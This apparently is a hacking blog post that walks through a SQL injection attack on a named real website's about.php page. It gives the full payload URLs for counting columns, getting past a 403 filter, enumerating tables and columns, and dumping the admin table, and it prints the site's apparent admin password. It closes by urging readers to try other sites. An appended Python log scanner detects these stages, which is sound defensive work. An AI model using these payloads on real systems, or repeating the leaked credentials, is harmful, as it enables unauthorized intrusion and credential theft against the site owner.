SQL UNHEX --- 403 --- LIMIT.




Please do not modify anything on this website. I am only sharing this for education: check what you are in and get out. THANKS





http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF, am I drunk? ... mmm, no. Every value comes back OK because the injected text never leaves the quoted string. Here is the solution: add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

OK, 25 columns.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn, 403, f**k... I don't want to live in this world anymore... this website is secure D: ......


Don't worry, here is the solution:

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


Done... now it is OK again, but it does not show the f**k vulnerable column...

Just add ---> - <--- in front of the id.

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4,25)--+-


Well, now it shows columns 6 and 7.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

Done. Lucky today: the first table is the admin one, "Admin". Meh, OK, next.

Change the 0 in LIMIT to 1:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ###

OK, leave it. We already have the name: it is admin, you saw it before.

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

But we need the user and pass. Let's search for them: just change +LIMIT+0,200--+- to +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....



########## this shows the username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

Done, here is the username, but keep searching for the pass ..... change it to 2, 3, etc ...


########### this shows the password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

Well, username and password for admin.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now dump the data ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+admin)--+-

###( show "admin" ) = username = admin) ###



Now the column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done. Enjoy testing other websites.
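Seen from the server side, the stages above (the ORDER BY probing, the UNION SELECT that drew a 403 and passed once parenthesised, the information_schema reads wrapped in unhex(hex())) all show up in the access log. The Python sketch below is an added example, not part of the original post: it normalizes each request's query string and flags those stages, including a 403 followed by an allowed variant from the same client. The log lines, client address and shortened column lists are constructed sample data.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Client, request target and status from a common/combined access-log line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Stage signatures, applied to the normalized query string.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\b[\s(]+(?:all[\s(]+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "unhex_hex": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
}

def normalize(target):
    """Decode %xx and '+', drop /* */ comments, collapse whitespace, lowercase."""
    query = unquote_plus(urlsplit(target).query).lower()
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)  # MySQL reads a comment as whitespace
    return re.sub(r"\s+", " ", query)

def classify(target):
    q = normalize(target)
    return [name for name, rx in RULES.items() if rx.search(q)]

def scan(lines):
    """Return (client, kind, stage) alerts; kind is blocked, allowed or blocked_then_allowed."""
    blocked = defaultdict(set)  # stages already answered with 403, per client
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for stage in classify(target):
            if status == "403":
                blocked[client].add(stage)
                kind = "blocked"
            else:
                kind = "blocked_then_allowed" if stage in blocked[client] else "allowed"
            alerts.append((client, kind, stage))
    return alerts

# Constructed sample log (placeholder client address, shortened column lists).
_FMT = '203.0.113.7 - - [01/Jan/2024:10:00:0{} +0000] "GET /about.php?pid={} HTTP/1.1" {} 512'
SAMPLE_LOG = [_FMT.format(i, t, s) for i, (t, s) in enumerate([
    ("34", 200),
    ("34%27+order+by+25--+-", 200),
    ("34%27+union+select+1,2,3--+-", 403),
    ("34%27+union+(select+1,2,3)--+-", 200),
    ("-34%27+union+(select+1,unhex(hex(table_name)),3+from+information_schema/**/.tables+limit+0,200)--+-", 200),
])]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Detection like this is only a backstop: the fetch_assoc() fatal error shows the query is built from the raw pid value, and binding pid as a query parameter removes the injection itself.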



REMEMBER

Please do not modify anything on this website. I am only sharing this for education: check what you are in and get out. THANKS

Note:

If you copy this, you must clearly credit the source: Dương-UG Blog's
 


Copyright © Dương-UG Blog's - Nguyễn Bình Dương